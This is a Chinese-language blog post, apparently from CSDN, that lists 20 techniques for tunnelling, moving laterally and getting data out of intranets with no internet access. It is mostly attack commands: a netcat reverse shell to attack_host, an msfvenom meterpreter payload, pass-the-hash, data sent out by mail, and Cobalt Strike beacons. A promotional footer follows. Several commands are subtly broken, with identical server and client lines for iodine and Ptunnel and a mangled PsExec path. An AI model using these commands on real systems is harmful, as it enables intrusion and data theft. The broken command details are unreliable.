渗透攻防中常见的20种突破内网不出网技巧。从零基础到精通,收藏这篇就够了!

渗透测试中,突破内网环境是一项极具挑战性的任务,尤其是当目标主机无法直接访问外部网络时。这种情况下,攻击者需要利用各种技巧和工具,在不直接出网的情况下进行内网渗透。本文将详细介绍20种常见的突破内网不出网的技巧,供参考。

一、基于隧道和代理的突破技巧
(一)端口转发(Port Forwarding)

端口转发是一种常用的技术,可以通过中间主机将流量转发到目标主机或从目标主机引导流量到外部网络。常见的端口转发方式包括:

  1. 1. 本地端口转发(Local Port Forwarding)

攻击者将目标主机的某些服务通过中间主机转发到攻击者的本地端口,从而像在本地访问这些服务一样。例如,通过SSH端口转发访问目标内网中的数据库服务器:

ssh -L 3306:192.168.1.100:3306 user@middle_host

上述命令将目标主机192.168.1.100的MySQL服务(端口3306)转发到攻击者的本地端口3306。

  1. 2. 远程端口转发(Remote Port Forwarding)

当目标主机无法主动访问外部网络时,可以通过目标主机将流量反向转发到攻击者的主机。例如:

ssh -R 8080:localhost:80 user@attack_host

上述命令将目标主机的本地HTTP服务(端口80)转发到攻击者的主机端口8080。

(二)代理隧道(Proxy Tunnel)

代理隧道是通过已有的主机或服务绕过网络限制的一种方法。常见的代理隧道工具包括:

  1. 3. Socks代理

使用工具如proxychains,通过代理服务器将流量转发出去。例如:

proxychains nmap -sT -Pn internal_host

通过proxychains利用代理进行内网主机扫描。

  1. 4. HTTP代理

通过上传代理脚本到目标服务器,建立代理隧道。例如,reGeorg和Proxifier是常用的代理隧道工具。

(三)DNS隧道(DNS Tunneling)

DNS隧道利用DNS请求在DNS查询中嵌入数据,实现外部通信。即使HTTP、HTTPS等流量被阻止,DNS流量通常不会被完全拦截。常用的DNS隧道工具包括iodine和dnscat2。

  1. 5. 使用iodine建立DNS隧道

在攻击者主机上运行DNS服务器:

iodine -f -c -P password example.com

在目标主机上运行客户端:

iodine -f -c -P password example.com

通过DNS隧道实现数据传输。

(四)ICMP隧道(ICMP Tunneling)

ICMP隧道利用ICMP流量进行数据传输,绕过防火墙。在某些情况下,即使TCP/UDP流量被封锁,ICMP(如Ping)可能仍然可用。常用的ICMP隧道工具包括Ptunnel和icmpsh。

  1. 6. 使用Ptunnel建立ICMP隧道

在攻击者主机上运行Ptunnel:

ptunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22

在目标主机上运行客户端:

ptunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22

通过ICMP隧道实现数据传输。

二、基于内网服务的突破技巧

(五)内网横向移动

内网横向移动是通过利用内网中存在的弱口令、未修补漏洞或域账户特权,获取其他内网主机的访问权限。例如:

  1. 7. 使用PsExec远程执行命令
PsExec.exe \192.168.1.100 -u user -p password cmd.exe

通过PsExec远程执行命令,获取其他内网主机的访问权限。

  1. 8. Pass-the-Hash攻击

利用已获取的哈希直接认证,绕过密码验证。例如:

pth-winexe -U user%hash //192.168.1.100 cmd.exe

通过pth-winexe工具进行Pass-the-Hash攻击。

(六)利用内网服务

检查目标主机是否有内网的特定服务,如数据库服务、文件共享服务等,可以通过这些服务找到绕过网络限制的途径。

  1. 9. 利用内网数据库服务

通过内网数据库服务与外部主机通信。例如,利用MySQL的LOAD DATA INFILE功能,将数据写入文件系统,再通过其他方式传输。

  1. 10. 利用SMB隧道

通过SMB隧道利用内网文件共享服务传输数据。例如:

smbclient //192.168.1.100/share -U user

通过SMB客户端访问内网文件共享服务。

(七)邮件、FTP或其他协议出网

某些内网环境可能封锁了常规的HTTP/HTTPS访问,但仍然允许其他协议(如邮件、FTP)进行外部通信。

  1. 11. 使用SMTP协议发送电子邮件

通过SMTP协议发送电子邮件将数据发出。例如:

echo "Data to exfiltrate" | mail -s "Subject" user@example.com

通过SMTP协议发送数据。

  1. 12. 使用FTP上传或下载文件

通过FTP上传或下载文件。例如:

ftp -i 192.168.1.100``put file.txt

通过FTP上传文件。

三、基于反向连接的突破技巧

(八)反向Shell和反向隧道

反向Shell和反向隧道是通过让目标主机发起连接到攻击者主机,建立回连。

  1. 13. 使用Netcat建立反向Shell

在目标主机上运行:

nc -e /bin/sh attack_host 4444

在攻击者主机上监听:

nc -l -p 4444

通过反向Shell连接到攻击者的主机。

  1. 14. 使用Metasploit建立反向Shell

在目标主机上运行:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_host LPORT=4444 -f exe -o shell.exe

在攻击者主机上运行:

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost attack_host; set lport 4444; run"

通过Metasploit建立反向Shell。

(九)Cobalt Strike的中转功能

Cobalt Strike是内网渗透中常用的工具,其Socks代理功能可以在目标主机不通外网的情况下,通过中转功能建立代理连接。

  1. 15. 使用Cobalt Strike的Socks代理

在目标主机上运行Beacon,通过Socks代理功能建立代理连接。例如:

beacon> socks 8080

在攻击者主机上使用代理工具连接到目标主机。

(十)SMB Beacon

SMB Beacon是Cobalt Strike中的一种特殊功能,通过Windows命名管道进行通信,相对隐蔽。

  1. 16. 使用SMB Beacon

创建一个SMB的Listener后,可以在主Beacon上链接或断开子Beacon。例如:

beacon> smb 192.168.1.100 445

通过SMB Beacon建立连接。

四、基于工具和脚本的突破技巧

(十一)reGeorg和Neo-reGeorg

reGeorg是一种常用的代理隧道工具,通过上传脚本到目标服务器的网站目录下,建立代理隧道。Neo-reGeorg则在此基础上增加了加密功能,使数据传输更加隐蔽。

  1. 17. 使用reGeorg建立代理隧道

在目标服务器上上传reGeorg脚本:

curl -o proxy.py http://example.com/reGeorg.py

在攻击者主机上运行代理客户端:

python proxy.py -s http://192.168.1.100/reGeorg.py -l 8080 -r 192.168.1.200:80

通过reGeorg建立代理隧道。

(十二)Pystinger

Pystinger通过WebShell实现内网SOCK4代理,端口映射可以使目标在不出网的情况下上线。

  1. 18. 使用Pystinger建立代理

将stinger_server.exe上传到目标服务器,并在公网VPS上运行stinger_client,建立代理连接。例如:

python stinger_client.py -s 192.168.1.100 -p 8080 -l 8081

通过Pystinger建立代理连接。

(十三)Frp

Frp是一种内网穿透工具,可以在目标主机不通外网的情况下,通过已控的双网卡内网服务器建立通道。

  1. 19. 使用Frp建立内网穿透

在目标主机上运行Frp客户端:

./frpc -c frpc.ini

在攻击者主机上运行Frp服务端:

./frps -c frps.ini

通过Frp建立内网穿透。

(十四)其他工具和脚本

除了上述工具外,还有一些其他工具和脚本可以用于突破内网不出网的场景。

  1. 20. 使用Chisel建立隧道

Chisel是一种轻量级的隧道工具,可以用于内网穿透。例如:

在目标主机上运行:

./chisel client --reverse attack_host:8080 R:8081:localhost:80

在攻击者主机上运行:

./chisel server --port 8080 --reverse

通过Chisel建立隧道。

题外话

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。

内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值